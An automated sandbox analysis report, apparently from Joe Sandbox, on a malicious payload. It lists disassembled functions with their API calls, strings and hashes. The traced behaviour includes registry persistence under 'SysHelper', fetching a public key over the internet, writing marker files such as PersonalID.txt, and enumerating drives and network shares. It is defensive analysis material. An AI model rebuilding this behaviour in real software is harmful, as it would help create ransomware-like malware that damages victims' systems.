                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                                                                                                        • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                                                                                        • API String ID: 2864494435-54166481
                                                                                                                                                                        • Opcode ID: e2f95293b8fd4dae01ae3653216e4dbfea79cde6997f3addd0ea110eb12c9469
                                                                                                                                                                        • Instruction ID: b1c9ced61109202d6031c884d03ece7bce39d7a48d840be3a2c3e63d0e65c5f6
                                                                                                                                                                        • Opcode Fuzzy Hash: e2f95293b8fd4dae01ae3653216e4dbfea79cde6997f3addd0ea110eb12c9469
                                                                                                                                                                        • Instruction Fuzzy Hash: CA918D72D002199BDF21DFA8CC857EEBBF5EF14304F1405B9E809A7241E776AA44CBA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9F310 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 311libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryW.KERNEL32(Shell32.dll,75B04E90), ref: 00B9F338
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00B9F353
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                                        • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                                                                                                        • API String ID: 2574300362-2555811374
                                                                                                                                                                        • Opcode ID: 204ddf31b400b9ac98b0a91636a7e2ef4cfb480edc4e8a32bf28ef9d945b3fcc
                                                                                                                                                                        • Instruction ID: f2e2d3af344797642c78ca24b093f7b51176a30ab4c4fa880a31cb25e96253e7
                                                                                                                                                                        • Opcode Fuzzy Hash: 204ddf31b400b9ac98b0a91636a7e2ef4cfb480edc4e8a32bf28ef9d945b3fcc
                                                                                                                                                                        • Instruction Fuzzy Hash: 7CC15A71D0120AEBDF10DFA4DD89BEEBBF5BF14318F104069E405A7250EBB5AA58CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9C6A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,00BAE6D4), ref: 00B9C6C2
                                                                                                                                                                        • RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 00B9C6F3
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00B9C700
                                                                                                                                                                        • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 00B9C725
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00B9C72E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseValue$OpenQuery
                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                                                                                                        • API String ID: 3962714758-1667468722
                                                                                                                                                                        • Opcode ID: 615d6e83b1974852fc2fb5cd6358e5c924535fe957c7d73d1b27739e1966299f
                                                                                                                                                                        • Instruction ID: 2346b984c533fb4e8e852bcb6e57e54bb5c6bd7e78420c09213aaa71a9475fdf
                                                                                                                                                                        • Opcode Fuzzy Hash: 615d6e83b1974852fc2fb5cd6358e5c924535fe957c7d73d1b27739e1966299f
                                                                                                                                                                        • Instruction Fuzzy Hash: 60111B75A40308FFDF119F90DC46BEEBBB8EB04719F1041A5EA10B21A1D7B15A54AB54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BAE6E8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44stringnetworkfileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 00BAE707
                                                                                                                                                                          • Part of subcall function 00B9C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 00B9C51B
                                                                                                                                                                        • InternetOpenW.WININET ref: 00BAE743
                                                                                                                                                                        • _wcsstr.LIBCMT ref: 00BAE7AE
                                                                                                                                                                        • _memmove.LIBCMT ref: 00BAE838
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 00BAE90A
                                                                                                                                                                        • lstrcatW.KERNEL32(?,&first=false), ref: 00BAE93D
                                                                                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00BAE954
                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00BAE96F
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00BAE98C
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00BAE9A3
                                                                                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 00BAE9CD
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00BAE9F3
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00BAE9F6
                                                                                                                                                                        • _strstr.LIBCMT ref: 00BAEA36
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00BAEA59
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00BAEA74
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00BAEA82
                                                                                                                                                                        • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 00BAEA92
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00BAEAA4
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00BAEABA
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00BAEAC8
                                                                                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 00BAEAE3
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BAEB5B
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00BAEB7C
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BAEB86
                                                                                                                                                                        • _memset.LIBCMT ref: 00BAEB94
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 00BAEBAE
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BAEBB6
                                                                                                                                                                        • _strstr.LIBCMT ref: 00BAEBDA
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00BAEC00
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00BAEC24
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00BAEC32
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                                                                                                                                                        • String ID: bowsakkdestx.txt${"public_key":"
                                                                                                                                                                        • API String ID: 2805819797-1771568745
                                                                                                                                                                        • Opcode ID: a11c5f0be8447ea3a5e81e7e9b8b09d7eeb4158ac31f07f1dfa86f9f9c1203f8
                                                                                                                                                                        • Instruction ID: 3769bf816cf593b17960dbb37306e30f499aa58a5243b467f9003c230633148c
                                                                                                                                                                        • Opcode Fuzzy Hash: a11c5f0be8447ea3a5e81e7e9b8b09d7eeb4158ac31f07f1dfa86f9f9c1203f8
                                                                                                                                                                        • Instruction Fuzzy Hash: EB018C3044C385ABDA30DF209C49BDF7BD8AF52704F0448A9B98492182EB70E608C7A2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA1B10 Relevance: 10.6, APIs: 7, Instructions: 50timewindowsleepCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • timeGetTime.WINMM(?,?,?,?,00BAEE2F), ref: 00BA1B1E
                                                                                                                                                                        • timeGetTime.WINMM(?,?,00BAEE2F), ref: 00BA1B29
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BA1B4C
                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00BA1B5C
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BA1B6A
                                                                                                                                                                        • Sleep.KERNEL32(00000064,?,?,00BAEE2F), ref: 00BA1B72
                                                                                                                                                                        • timeGetTime.WINMM(?,?,00BAEE2F), ref: 00BA1B78
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3697694649-0
                                                                                                                                                                        • Opcode ID: b6de8dda1827a0ac3357b60511bcd0d4c165d9e8a8a6cb539537e69e323668ab
                                                                                                                                                                        • Instruction ID: 0cb07de317dcffcf08b9e1cad4acd3065fc147a94c6bae8da69ede8c1afb327c
                                                                                                                                                                        • Opcode Fuzzy Hash: b6de8dda1827a0ac3357b60511bcd0d4c165d9e8a8a6cb539537e69e323668ab
                                                                                                                                                                        • Instruction Fuzzy Hash: 4F01D436A41318AADB20A7E98C81FEDB3ACFB08B41F4400A5F700B70D0E670A940CBF5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9C500 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 00B9C51B
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00B9C539
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$AppendFolder
                                                                                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                                                                                        • API String ID: 29327785-2616962270
                                                                                                                                                                        • Opcode ID: f1e6267cee75fd78aa130fb857c65a40cb0c1cc322d96fe9f44a6220cb459538
                                                                                                                                                                        • Instruction ID: f151ff7700744b2f6806ed15c7c402b583f24147f224ea039344d6bb9e67df28
                                                                                                                                                                        • Opcode Fuzzy Hash: f1e6267cee75fd78aa130fb857c65a40cb0c1cc322d96fe9f44a6220cb459538
                                                                                                                                                                        • Instruction Fuzzy Hash: DA11E7B2A4032833DD2075696C87FEF77DCDB55B21F4100F6FA0CD2142E5A6955542E1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BABA80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 00BABAAD
                                                                                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 00BABABE
                                                                                                                                                                        • UpdateWindow.USER32(00000000), ref: 00BABAC5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$CreateShowUpdate
                                                                                                                                                                        • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                                                                                                        • API String ID: 2944774295-3503800400
                                                                                                                                                                        • Opcode ID: 7d9cd1e4e993737110df545c54c79712b5db4b7dc1681609e10173efe2aae960
                                                                                                                                                                        • Instruction ID: 8dccd9c90624a1bd25f94071e424aac5596180f5c31e1baf24dd52222bbc3a7f
                                                                                                                                                                        • Opcode Fuzzy Hash: 7d9cd1e4e993737110df545c54c79712b5db4b7dc1681609e10173efe2aae960
                                                                                                                                                                        • Instruction Fuzzy Hash: 80E04F356817647BE7315714BC4BFDE3554E702F11F304159FA017E2E0C7E169818A8C
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA0BD0 Relevance: 7.7, APIs: 5, Instructions: 234sharememoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00BA0C12
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00004000), ref: 00BA0C39
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA0C4C
                                                                                                                                                                        • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00BA0C63
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 364255426-0
                                                                                                                                                                        • Opcode ID: 5864fe73c41deec722aa6f5a013055bf53976567b66e9dbbbedfcf749e611a8f
                                                                                                                                                                        • Instruction ID: f884df3073e0a2773f9ffaba21243a7c00c42d531f07db4521c28df61369c139
                                                                                                                                                                        • Opcode Fuzzy Hash: 5864fe73c41deec722aa6f5a013055bf53976567b66e9dbbbedfcf749e611a8f
                                                                                                                                                                        • Instruction Fuzzy Hash: C091E17561C3419FD728EF68C891B6BB7E1FF85714F1489ADF88A87280E770A940CB52
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA0A50 Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLogicalDrives.KERNEL32 ref: 00BA0A75
                                                                                                                                                                        • SetErrorMode.KERNEL32(00000001,00C90234,00000002), ref: 00BA0AE2
                                                                                                                                                                        • PathFileExistsA.SHLWAPI(?), ref: 00BA0AF9
                                                                                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00BA0B02
                                                                                                                                                                        • GetDriveTypeA.KERNEL32(?), ref: 00BA0B1B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2560635915-0
                                                                                                                                                                        • Opcode ID: f968bfb1f009d7f6e9029e02dc322dfb642958abd15bb892d72a7df2d19f19f8
                                                                                                                                                                        • Instruction ID: afb02862e75e84cb15e9f39cf73499b4d7486d717fe9dc49682c170c3b007fb5
                                                                                                                                                                        • Opcode Fuzzy Hash: f968bfb1f009d7f6e9029e02dc322dfb642958abd15bb892d72a7df2d19f19f8
                                                                                                                                                                        • Instruction Fuzzy Hash: 1441C17150C3409FC710EF68C885B5FBBE4EB99719F500A6CF085962A1D7B5C548CB93
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9F0E0 Relevance: 6.1, APIs: 4, Instructions: 86filestringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,00000000,?,?), ref: 00B9F125
                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00B9F198
                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000), ref: 00B9F1A1
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B9F1A8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$CloseCreateHandleWritelstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1421093161-0
                                                                                                                                                                        • Opcode ID: 918fee75042f4a8812a688da010079c447e55c67586a8a42c3b76432da6e3096
                                                                                                                                                                        • Instruction ID: 6dbd3bc2c904b70c9cae9f2749044ff2fad1d28e442d798133a00d4cf0393011
                                                                                                                                                                        • Opcode Fuzzy Hash: 918fee75042f4a8812a688da010079c447e55c67586a8a42c3b76432da6e3096
                                                                                                                                                                        • Instruction Fuzzy Hash: A831E135900205EFDF149F68CC46BAE7BB8EB05715F104169F805B71C0D7756A84CBE1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BAB185 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147windowCOMMON
                                                                                                                                                                        Download Yara Rule
